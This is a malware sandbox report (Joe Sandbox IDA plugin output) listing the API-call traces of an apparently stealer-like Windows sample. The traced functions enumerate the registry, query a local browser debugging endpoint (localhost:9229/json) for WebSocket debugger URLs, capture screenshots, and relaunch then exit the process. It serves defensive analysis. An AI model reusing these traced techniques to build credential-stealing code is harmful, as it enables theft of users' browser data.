                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: 1cd83b5223bed5f07b5e3df48ca6745f3d6adb60b2981c7138f1fd554ec3af45
                                • Instruction ID: c03664ddd2033e031eaba1c109c99b863657b62fba80300c3e24136e8b21aa51
                                • Opcode Fuzzy Hash: 1cd83b5223bed5f07b5e3df48ca6745f3d6adb60b2981c7138f1fd554ec3af45
                                • Instruction Fuzzy Hash: 6DB1AF719102599FCB10EFA4DC849EE77B9FF88304F148568F91AE7251DB30AE48DB90
                                Function 00C7B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7B330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7B3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B3D9
                                • lstrlen.KERNEL32(00CA4C50), ref: 00C7B450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B474
                                • lstrcat.KERNEL32(00000000,00CA4C50), ref: 00C7B480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B4A9
                                • lstrlen.KERNEL32(00000000), ref: 00C7B52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7B55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B587
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C7B5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B622
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C7B62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B65E
                                • lstrlen.KERNEL32(?), ref: 00C7B767
                                • lstrlen.KERNEL32(?), ref: 00C7B776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7B79E
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: ab588240a02e10dbba9db43592cc9138fe393e4a53fc4c25339b02bc1a829755
                                • Instruction ID: 64ac93d1158351a0e8fbf9f1a9a397fdbb453e7f15c01a78b2580aea3d3870e5
                                • Opcode Fuzzy Hash: ab588240a02e10dbba9db43592cc9138fe393e4a53fc4c25339b02bc1a829755
                                • Instruction Fuzzy Hash: CF025B30A01206CFCB65DF69D989B6ABBF5EF45314F19C069E41D9B262DB31ED42CB80
                                Function 00C93760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • RegOpenKeyExA.ADVAPI32(?,0179B758,00000000,00020019,?), ref: 00C937BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00C937F7
                                • wsprintfA.USER32 ref: 00C93822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00C93840
                                • RegCloseKey.ADVAPI32(?), ref: 00C9384E
                                • RegCloseKey.ADVAPI32(?), ref: 00C93858
                                • RegQueryValueExA.ADVAPI32(?,0179EA50,00000000,000F003F,?,?), ref: 00C938A1
                                • lstrlen.KERNEL32(?), ref: 00C938B6
                                • RegQueryValueExA.ADVAPI32(?,0179EA80,00000000,000F003F,?,00000400), ref: 00C93927
                                • RegCloseKey.ADVAPI32(?), ref: 00C93972
                                • RegCloseKey.ADVAPI32(?), ref: 00C93989
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 3f1fb0ffa882d7571f1c5a7639ef3c6d25d935f6852c5dd2db5dc7ca283cef85
                                • Instruction ID: 76f9efafb8482254a0abe51ece98115a0df05413c1c94143d0f3e0df392d8080
                                • Opcode Fuzzy Hash: 3f1fb0ffa882d7571f1c5a7639ef3c6d25d935f6852c5dd2db5dc7ca283cef85
                                • Instruction Fuzzy Hash: 8F917EB2A00249DFCF10DFA5DD88AEEB7B9FB48310F158569E509BB211D731AE45CB90
                                Function 00C790C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C790DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00C790FC
                                • InternetCloseHandle.WININET(00000000), ref: 00C79109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00C79166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C79197
                                • InternetCloseHandle.WININET(00000000), ref: 00C791A2
                                • InternetCloseHandle.WININET(00000000), ref: 00C791A9
                                • strlen.MSVCRT ref: 00C791BA
                                • strlen.MSVCRT ref: 00C791ED
                                • strlen.MSVCRT ref: 00C7922E
                                • strlen.MSVCRT ref: 00C7924C
                                  • Part of subcall function 00C78980: std::_Xinvalid_argument.LIBCPMT ref: 00C78996
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: c9697be93f05959e7c2fed5deb5ee61a591ba9b3a248b83745138c650621202d
                                • Instruction ID: ff39a48abcff5ad97295a60ac6f6a1a462615c9e5b27d33f8866680f0da96733
                                • Opcode Fuzzy Hash: c9697be93f05959e7c2fed5deb5ee61a591ba9b3a248b83745138c650621202d
                                • Instruction Fuzzy Hash: 4A51C5717402066BDB10DBA9DC89BDEF7F9EB88710F144169F905E3280DBB4EA4887A5
                                Function 00C91660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00C916A1
                                • lstrcpy.KERNEL32(00000000,0178A708), ref: 00C916CC
                                • lstrlen.KERNEL32(?), ref: 00C916D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C916F6
                                • lstrcat.KERNEL32(00000000,?), ref: 00C91704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9172A
                                • lstrlen.KERNEL32(0179E6C8), ref: 00C9173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91762
                                • lstrcat.KERNEL32(00000000,0179E6C8), ref: 00C9176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91792
                                • ShellExecuteEx.SHELL32(?), ref: 00C917CD
                                • ExitProcess.KERNEL32 ref: 00C91803
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: c9a3c21b93971f03658359f36ef76f8a5d2b9657a21dcf37817f86ce45386a8a
                                • Instruction ID: 6248028b11accba5645027e6ad74e6e989bc3174e15398cec0c89795f759379e
                                • Opcode Fuzzy Hash: c9a3c21b93971f03658359f36ef76f8a5d2b9657a21dcf37817f86ce45386a8a
                                • Instruction Fuzzy Hash: BF51A270A0121BAFDB51DFA5CD89A9EBBF9EF59300F088125E915E3251DB30AF05CB90
                                Function 00C8EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C8F026
                                • lstrlen.KERNEL32(00000000), ref: 00C8F035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00C8F053
                                • StrStrA.SHLWAPI(00000000,?), ref: 00C8F081
                                • lstrlen.KERNEL32(?), ref: 00C8F094
                                • lstrlen.KERNEL32(00000000), ref: 00C8F0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00C8F0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00C8F13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 054b83823b93183ca1fe673f85aeacd0dacfa4c4d0ae505b0f1d3de3d56f1aa6
                                • Instruction ID: b8b7dc8e5e8cf8df9bd3ea6915576fbe93db4984ba420184ee4c84f382c5944d
                                • Opcode Fuzzy Hash: 054b83823b93183ca1fe673f85aeacd0dacfa4c4d0ae505b0f1d3de3d56f1aa6
                                • Instruction Fuzzy Hash: 59518131A101059FCB21BF79DC49A6E7BE4EF95314F09817CF85A9B212DB30ED02A794
                                Function 00C7A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(01798B58,00EA9BD8,0000FFFF), ref: 00C7A026
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7A053
                                • lstrlen.KERNEL32(00EA9BD8), ref: 00C7A060
                                • lstrcpy.KERNEL32(00000000,00EA9BD8), ref: 00C7A08A
                                • lstrlen.KERNEL32(00CA4C4C), ref: 00C7A095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7A0B2
                                • lstrcat.KERNEL32(00000000,00CA4C4C), ref: 00C7A0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7A0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7A0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7A114
                                • SetEnvironmentVariableA.KERNEL32(01798B58,00000000), ref: 00C7A12F
                                • LoadLibraryA.KERNEL32(01785208), ref: 00C7A143
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 6062684293df59417623a0c5fa5810504e14f5e6cb9c1a77661334cafcdf6121
                                • Instruction ID: 9c9ef0da6710a3fcd039dd54a4c0b2fc00b71bdf107a7e50f88419ffcac5294c
                                • Opcode Fuzzy Hash: 6062684293df59417623a0c5fa5810504e14f5e6cb9c1a77661334cafcdf6121
                                • Instruction Fuzzy Hash: 01910530A00600CFD7309FA5DD85A6A37A5FBD9705F44C528E51E9B2A2EF75EE44CB82
                                Function 00C8C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8C8A2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8C8D1
                                • lstrlen.KERNEL32(00000000), ref: 00C8C8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8C932
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C8C943
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 27ded22ac94c7fae2a8df6b8bfcca527d36dd176de6dd259c97618a60522cade
                                • Instruction ID: f9e71b80e9c5e8612cc8f79e7d0d62a23f11f5c3912d55d3f1c5dba55eee05ac
                                • Opcode Fuzzy Hash: 27ded22ac94c7fae2a8df6b8bfcca527d36dd176de6dd259c97618a60522cade
                                • Instruction Fuzzy Hash: 8D61C371E0121A9FCB10EFB5C8C8AEE7BF8EF0A348F044065E855E7241DB349A059BA4
                                Function 00C941E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00C90CF0), ref: 00C94276
                                • GetDesktopWindow.USER32 ref: 00C94280
                                • GetWindowRect.USER32(00000000,?), ref: 00C9428D
                                • SelectObject.GDI32(00000000,00000000), ref: 00C942BF
                                • GetHGlobalFromStream.COMBASE(00C90CF0,?), ref: 00C94336
                                • GlobalLock.KERNEL32(?), ref: 00C94340
                                • GlobalSize.KERNEL32(?), ref: 00C9434D
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 647a5c2df2a2e39ce65228fa39fb6f5d62325b19ff6b4396ec24958fe3913198
                                • Instruction ID: 7a815cd49e93b998380bc5f7112497a24c9e5b9928b75c5948ead26a6519da01
                                • Opcode Fuzzy Hash: 647a5c2df2a2e39ce65228fa39fb6f5d62325b19ff6b4396ec24958fe3913198
                                • Instruction Fuzzy Hash: 32514D75A10209AFCB10DFA5DD89EAEB7B9FF89310F104019F905A3251DB30AE059BA0
                                Function 00C8DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,0179ECF0), ref: 00C8E00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8E037
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E07D
                                • lstrcat.KERNEL32(?,?), ref: 00C8E098
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0AC
                                • lstrcat.KERNEL32(?,0178A5C8), ref: 00C8E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0D4
                                • lstrcat.KERNEL32(?,0179DE70), ref: 00C8E0E7
